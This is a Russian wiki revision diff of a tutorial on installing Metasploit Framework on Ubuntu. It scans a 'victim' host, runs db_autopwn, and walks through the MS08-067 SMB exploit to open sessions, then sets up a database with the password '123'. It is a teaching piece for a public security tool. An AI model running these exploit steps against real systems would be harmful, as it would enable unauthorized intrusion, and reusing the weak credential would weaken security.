Различия
Здесь показаны различия между двумя версиями данной страницы.
Предыдущая версия справа и слева Предыдущая версия | |||
wiki:metasploit_framework_в_ubuntu [2011/09/27 21:25] |
wiki:metasploit_framework_в_ubuntu [2012/04/27 08:30] (текущий) |
||
---|---|---|---|
Строка 16: | Строка 16: | ||
Далее скачиваем Metasploit Framework вот тут: | Далее скачиваем Metasploit Framework вот тут: | ||
- | http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run: | + | http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run: |
<code bash> | <code bash> | ||
- | wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run | + | wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run |
- | chmod +x framework-4.*run | + | chmod +x metasploit-latest-linux-installer.run |
</code> | </code> | ||
И запускаем… | И запускаем… | ||
- | <code bash>sudo ./framework-4.*run</code> | + | <code bash>sudo ./metasploit-latest-linux-installer.run</code> |
После установки необходимо обновить Metasploit Framework | После установки необходимо обновить Metasploit Framework | ||
<code bash>sudo msfupdate</code> | <code bash>sudo msfupdate</code> | ||
- | Теперь самый простой вариант использованияMetasploit Framework. Запустим консоль. | + | Теперь самый простой вариант использования Metasploit Framework. Запустим консоль. |
- | <code bash>Msfconsole</code> | + | <code bash>msfconsole</code> |
Теперь добавим нашу жертву в базу данных и информацию про его порты. | Теперь добавим нашу жертву в базу данных и информацию про его порты. | ||
<code bash>db_nmap -sT -sV 192.168.1.1</code> | <code bash>db_nmap -sT -sV 192.168.1.1</code> | ||
- | Отправим все на автоматический взлом =). | + | Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях. |
<code bash>db_autopwn -p -t -e</code> | <code bash>db_autopwn -p -t -e</code> | ||
Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее. | Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее. | ||
<code bash>session -i 1</code> | <code bash>session -i 1</code> | ||
+ | |||
+ | Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так: | ||
+ | |||
+ | <code bash> | ||
+ | #Загружаем нужный нам эксплоит | ||
+ | use exploit/windows/smb/ms08_067_netapi | ||
+ | #Смотрим опции | ||
+ | show options | ||
+ | #Заполняем необходимые поля например IP адрес жертвы | ||
+ | set RHOST 192.168.84.58 | ||
+ | #Проверяем актуален ли эксплоит для жертвы | ||
+ | check | ||
+ | #Ломаем | ||
+ | exploit | ||
+ | </code> | ||
Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите: | Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите: | ||
Строка 46: | Строка 61: | ||
<code bash>exit | <code bash>exit | ||
hosts -d 192.168.1.1</code> | hosts -d 192.168.1.1</code> | ||
+ | |||
+ | Иногда Базы данных отваливаются я решил данный вопрос вот так: | ||
+ | <code bash> | ||
+ | sudo apt-get install postgresql | ||
+ | sudo apt-get install libpgsql-ruby | ||
+ | sudo su postgres | ||
+ | createuser root -P | ||
+ | Enter password for new role: 123 | ||
+ | Enter it again:123 | ||
+ | Shall the new role be a | ||
+ | superuser? (y/n) n | ||
+ | Shall the new role be allowed to | ||
+ | create databases? (y/n) n | ||
+ | Shall the new role be allowed to | ||
+ | create more new roles? (y/n) n | ||
+ | createdb --owner=root metasploit | ||
+ | exit | ||
+ | msfconsole | ||
+ | db_connect root:123@127.0.0.1/metasploit | ||
+ | </code> | ||
\\ \\ | \\ \\ | ||
- | ^Автор^Раздел^ | + | Александр Ф Михайлов (ChelAxe) |
- | |Михайлов Александр (ChelAxe)|как сделать ...| | + | |
{{tag>Конкурс}} | {{tag>Конкурс}} |